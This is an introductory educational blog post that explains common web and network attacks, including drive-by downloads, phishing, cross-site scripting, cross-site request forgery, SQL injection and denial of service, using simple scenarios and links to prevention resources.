Connectivity and always-on can be wonderful. The Internet and the wide range of connected devices have made access to digital resources as easy as a mouse-click or a touch. But with increased convenience come increased security vulnerabilities. Every connection to the Internet, and every web page offers another opportunity for attackers to cause damage, gain unauthorized access to information, and impersonate other users. This post gives a brief discussion of various ways in which malicious users cause problems for almost all of us.
Drive-by Downloading is a method used by attackers to get their malicious code on a user’s machine by causing it to be downloaded without the user’s knowledge or consent.
We start with drive-by downloading as it is closely tied to our discussion in the
malware post. Malicious attackers have to find ways to get their malicious code on a user’s machine, and one way to do this is called drive-by downloading. Let’s say you are surfing the web, and you click on a link to what you think is a legitimate website. When you get there, it might even appear to be a good website, but what you don’t know is that a script was triggered that automatically downloaded code to your machine without your knowledge or authorization. Sometimes drive-by downloading is done with the user’s authorization but without their full knowledge. For example, you might think you are downloading a video, but what you don’t know is that there is another, malicious segment of code inside that is now being downloaded to your machine. Keep in mind that not all the code downloaded has to be outrightly malicious. Sometimes it can just be annoying and cause problems by slowing the machine down.
The following article gives some real-world examples of drive-by download attacks and lists 6 ways that companies can protect their users against drive-by downloading attacks.
http://www.cio.com/article/2448967/security0/6-ways-to-defend-against-drive-by-downloads.html
Phishing is a word used to describe how an attacker “phishes” for user information by using both social engineering and digital techniques to trick a user into divulging private and valuable information.
Phishing is a common way that attackers try to get information from unwary users. This kind of attack often relies heavily on
social engineering – that is, trying to get information by exploiting or tricking humans directly. For example, an attacker may send an e-mail asking for the recipient to verify their account information. When the recipient clicks on the link, he is directed to a web page that looks legitimate but is actually a fake. Then, when he types in his username and password, the information is sent to the attacker, who now has the authentication credentials.
The following article from Norton by Symantic offers a brief explanation of phishing and 7 tips for protecting yourself against it:
http://us.norton.com/7-tips-to-protect-against-phishing/article
Cross-Site Scripting (XSS) is an attack in which a malicious website user inserts her own malicious script into the website, so that when another unsuspecting user visits the site, the script is run, possibly stealing valuable information.
A sizable portion of web attacks are cross-site scripting (XSS) attacks, which take advantage of the fact that many websites allow users to insert their own script into the page. For example, consider a website where users can log in and post comments on a message board. Like many sites that require authentication, the site uses a couple of
cookies (small text files saved in the browser) containing the authentication tokens, such as the username and password. Let’s say Alice logs in to the website. Her username and password are automatically saved as cookies in the browser. Then she goes to the message board and sees that Mallory posted a comment about an article. She clicks on the message and reads “This was a really great article!” but what she doesn’t know is that Mallory has also written some JavaScript that is not visible, which executed as soon as she clicked on it. Without her knowledge, it sent a request to Mallory’s website with Alice’s cookie information. This means that Mallory now has Alice’s authentication credentials.
The following article explains different kinds of XSS attacks in more detail and gives some examples of XSS attacks.
http://www.thegeekstuff.com/2012/02/xss-attack-examples/
Protecting against XSS attacks. Preventing XSS attacks requires good programming when building websites. There are many ways for an attacker to cause an XSS attack, so web developers must be very aware of the possible vulnerabilities and take measures to eliminate them in order to prevent attacks. There are many resources online about preventing XSS attacks, but many are very technical and beyond the scope of this posting. Keep in mind, though, that XSS attacks use user-inserted, so much of the prevention depends upon input sanitization. This means that the developer should limit what a user can post. According to the “Cheat Sheet” below, “The first rule is to deny all.”
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
Cross-Site Request Forgery (XSRF) is another kind of browser-based attack in which an attacker lures a website user away from the website to a malicious website where a script executes that causes a request to be sent back to the original website using the unwary user’s credentials.
This kind of attack takes advantage of a website’s trust in a user. Let’s use the example of the message board again. This time, Alice logs in and again her authentication credentials are saved as cookies. One of the conveniences of cookies is that if Alice goes to another website without logging out of the first website, then returns to the message board website, she won’t have to log back in. Unfortunately, this also presents an opportunity for Cross-Site Request Forgery. So Alice logs in and sees that Mallory has posted a link to a funny dog picture. Alice clicks on the link and is re-directed to a page that does indeed contain a funny dog picture. What she doesn’t know is that it also contains a hidden piece of JavaScript that executes automatically when the funny dog picture page loads. This script sends a request through the browser back to the message board page using Alice’s cookie credentials and posts something on the message board under Alice’s name. The page never re-directs. Alice never knows. This may seem innocent, right? How much damage can Mallory do by posting something on a message board with Alice’s credentials? But what if it wasn’t a message board? What if it was Alice’s bank account, and the request Mallory sent authorized Alice’s bank to transfer funds from Alice’s account into Mallory’s?
Protecting against XSRF attacks. Like XSS attacks, preventing XSRF attacks requires good programming in web development. The two types are also related in that any XSS vulnerabilities can be used to execute XSRF attacks as well. This does not mean that the one is necessary for the other, but it does mean that good web development requires prevention of both kinds of attacks. The link below outlines common prevention measures that are not sufficient, as well as measures that will help prevent XSRF attacks.
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
From a user standpoint, it is a good idea to log out of a website when leaving because XSRF attacks often take advantage of the automatic re-authentication process when a user leaves a website without logging out.
SQL Injection is a database-centered attack in which an attacker is able to access or affect information in a database by injecting SQL code into a web form.
Many websites connect to and communicate with databases in order to perform certain tasks. For example, just logging in to a website requires interaction with a database that contains usernames and passwords. SQL is a programming language used for communicating with a database. A SQL injection attack is when an attacker, given the opportunity to communicate with a database through a website (such as through a log-in page) types in an SQL command instead of what is expected. If the code is not written securely, the attacker may succeed in getting unauthorized access to the database. Such access could mean the ability to get information such as usernames and passwords or to delete or change information in the database. Consider a website that requires a secret key for registration. With a successful SQL injection attack, someone might be able to bypass the secret key requirement and add his username and password to the database, thereby gaining unauthorized access to the website.
Preventing SQL Injection. Like XSS attacks, SQL injection attacks are largely prevented by input sanitization, which of course is largely the responsibility of the web developer. SQL injection is made possible when input from a user interacts directly with a database. There are ways, however, to sanitize the input before interaction with the database, so that any SQL commands that an attacker might try are treated as strings of characters rather than executable commands. The following links give more detailed information on SQL injection prevention.
https://xkcd.com/327/
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
http://www.w3schools.com/sql/sql_injection.asp
Denial of Service (DOS) is a network-related attack in which a resource, such as a particular web server, is bombarded with so many requests (often from fake IP addresses) that the server crashes and becomes unavailable to legitimate users.
This network attack can also disrupt interaction with a specific web page. In order to access a website, the user sends a request to the website and receives a response. There is a standard procedure for this and the basic idea of a Denial of Service (DOS) is that an attacker sends so many requests to a web page that the page crashes, essentially shutting down its service to other users. A Distributed Denial of Service (DDOS) attack is when the requests come from many different hosts. Often this is done by an army of zombie agents, often without their owners’ knowledge. Basically, an attacker will first gain access to a bunch of machines. Then, at a pre-arranged time, all the machines will send requests to the website to shut it down. DOS attacks can be very costly for critical websites that need to be accessible to users at all times. Some DOS attacks are motivated by revenge, others by financial gain, and others by activism. One example of financial gain is when some cyber criminals send a letter to a corporation threatening a DOS attack unless they receive payment by a certain time. An example of activism would be an attacker taking down a political website because she disagrees with the website’s views.
The following articles include real-world examples of DOS/DDOS attacks:
http://www.independent.co.uk/life-style/gadgets-and-tech/worlds-largest-denial-of-service-attack-caused-by-vulnerability-in-the-infrastructure-of-the-web-9122200.html
http://www.net-security.org/secworld.php?id=11748
The following stackexchange post gives a brief explanation of DDOS attack prevention measures:
http://security.stackexchange.com/questions/73369/how-do-major-sites-prevent-ddos
See the video on “The Internet: Cybersecurity and Crime” at code.org for a good introduction to Network and Web Security.
